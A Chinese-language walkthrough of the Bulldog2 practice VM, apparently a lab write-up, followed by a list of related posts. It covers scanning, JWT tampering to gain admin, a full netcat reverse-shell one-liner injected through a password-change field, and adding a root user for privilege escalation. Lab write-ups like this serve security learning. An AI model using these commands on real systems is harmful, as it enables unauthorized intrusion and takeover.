Bulldog2 渗透测试
Bulldog2渗透测试
0x00:实验环境:
Bulldog2靶机
Kali linux
测试机 ubuntu19.10
0x01实验流程:
信息收集:
主机发现
端口发现
操作系统扫描
渗透测试
0x03 实验步骤:
- netdiscover主机发现
- 主机扫描(包括masscan和nmap)
Searchsploit nginx 1.14.0
- 访问web网站
发现无法注册,尝试dirb目录爆破
访问这两个目录,但是没有有价值的内容
- 查看前端代码
下载这四个js代码到本地
在vscode中打开并使用Beautiful代码美化插件美化
对代码进行审计,在web网页中得到无法注册的信息,在js代码中查询Register,发现注册需要四条信息,对其进行模拟注册
- 使用burpsuite抓包进行注册
导入repeater,并修改数据包内容
将认证改为注册,并添加注册所需的信息
但是什么都没有,考虑提取权限
仔细观察可以发现,用户名直接在url后面,我们可以尝试水平越权
更改url后面的用户名为admin
- 再次登陆,burpsuite抓取回包信息,返回一个JWT开头的token字段
JWT(Json Web Token)的声明,一般用于身份提供者和服务提供者间,来传递被认证的用户身份信息,以便从资源服务器获取资源,也可以增加一些额外的其他业务逻辑所必须的声明信息,该token也可直接被用于认证或被加密;
- 搜索jwt解密token值得
在js脚本中搜索auth_level得
修改token中auth_level为,同时修改返回包中用户信息auth_level为master_admin_user
此时,登陆显示的为管理员
- Burpsuite抓包
可以看到返回值为200,但最下面为false
在修改密码处执行反弹shell脚本
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.8.145 1234 >/tmp/f;
并且kali开启监听
获得shell权限
- 接下来,提权
查看passwd
添加一个root权限的用户
perl -le 'print crypt(“password”,“aa”)’
其中,pass为加密的密码;aa表示使用的加密盐(可以有aa,sa,Fx等),如果不使用加密盐,那么输出的字符串将不是crypt加密格式,而是MD5加密格式的。所以,加密盐其实是必须的参数
- 切换用户,wmy:password
用python命令打开一个新的终端
python -c 'import pty; pty.spawn("/bin/bash")'
至此,提权成功
0x04 思路总结
- 对于目录爆破出的页面,要仔细分析页面可以点击的链接,以及页面源代码,从中获取有用数据,包括用户名密码等
- 要善于利用burpsuite抓取并利用数据包
- 在获得shell权限后,可以首先寻找查看隐藏文件猜解root密码,或者通过其他手段例如创建root权限用户进行提权
Bulldog2 渗透测试相关推荐
- 渗透测试实战3——bulldog2靶机入侵
一.实验环境 Kali攻击机:192.168.247.149 bulldog 2靶机:192.168.247.150.(192.168.247.151) 开始之前,需先登录bulldog2.账号:di ...
- 查询Master下的系统表和系统视图获取数据库的信息和简单的渗透测试
在SQL中可以通过查询Master下的系统表(sys)和系统视图(information_schema)获取数据库的信息.SQL2000和SQL2005的结构略有不同. 系统表结构参考系统表详细说明. ...
- 渗透测试:正义黑客的渗透测试以及该过程和黑客活动的区别
2019独角兽企业重金招聘Python工程师标准>>> 渗透测试是正义黑客大展身手的地方.他们可以对漏洞评估中识别出的许多漏洞进行测试,以量化该漏洞带来的实际威胁和风险. 当正义黑客 ...
- 渗透测试是否需要学习Linux
渗透测试是一种利用模拟黑客攻击的手段,来评估生产系统的安全性能,用黑客惯用的破坏攻击方式,行的却是维护安全之事,也就是大家所说的白帽黑客.白帽黑客通常受雇于各大公司,是维护网络与计算机安全的主要力量. ...
- 暗渡陈仓:用低消耗设备进行破解和渗透测试1.2.2 渗透测试工具集
1.2.2 渗透测试工具集 Deck包含大量的渗透测试工具.设计理念是每个可能会用到的工具都应该包含进来,以确保在使用时无须下载额外的软件包.在渗透测试行动中给攻击机安装新的软件包很困难,轻则要费很大 ...
- 电网机巡智能管控平台渗透测试经历
目录 前言 渗透测试 概念 分类 手段 安全漏洞的影响 安全漏洞与BUG的关系 渗透测试的流程 明确目标 信息收集 漏洞扫描 漏洞利用 权限提升 痕迹清理 信息整理 分析报告及修复方案 前言 电网集训 ...
- 渗透测试与自动化安全测试工具比较
应用程序安全性并不新鲜,但它在需求.复杂性和深度方面正迅速增长.随着网络犯罪自疫情爆发以来增长了近600%,越来越多的SaaS企业开始争相保护他们的应用程序.即使那些运行最新端点保护的系统也面临重大漏 ...
- 《树莓派渗透测试实战》——2.7 设置SSH服务
本节书摘来自异步社区<树莓派渗透测试实战>一书中的第2章,第2.7节,作者[美]Joseph Muniz(约瑟夫 穆尼斯),Aamir Lakhani(阿米尔 拉克哈尼),朱筱丹 译,更多 ...
- 【渗透测试学习平台】 web for pentester -1.介绍与安装
web for pentester是国外安全研究者开发的的一款渗透测试平台,通过该平台你可以了解到常见的Web漏洞检测技术. 官网:https://www.pentesterlab.com 下载地址: ...
最新文章
- 这所211大学,实力强悍,适合“踩线生”报考!
- Java_JAVA6动态编译的问题
- python能做软件吗-python能够做软件的自动化测试吗?
- 模拟摇奖:从1-36中随机抽出8个不重复的数字
- android访问java服务器_Android_post访问java服务器端
- 创业,程序员心中说不出的痛
- python基础之名称空间和作用域、函数嵌套
- 使用Nginx配置NodeJs程序(Windows平台)
- mysql 数据迁移_【AWS 功能】Mysql 数据库迁移至Amazon RDS方案
- 信安教程第二版-第6章认证技术原理与应用
- 史上最贵域名诞生!360斥资1700万美元买360.com
- file上传代码 ios_文件上传_iOS上传SDK_客户端上传_上传SDK_视频点播 - 阿里云
- LightOJ 1366 - Pair of Touching Circles (在矩形中只需要两个圆相外切,有多少种) 半径圆心均为整数)...
- lora网关以太网传输
- php 批量 挂马,php下批量挂马和批量清马代码
- 忘记电脑开机密码怎么办
- C语言编程判断输入的英文字母是星期几
- Windows如何远程连接服务器?Linux服务器如何远程登录?远程连接服务器命令
- oracle如何增加initial,Oracle修改表和索引的INITIAL初始化大小
- 最实用的深度学习教程 Practical Deep Learning For Coders (Kaggle 冠军 Jeremy Howard 亲授)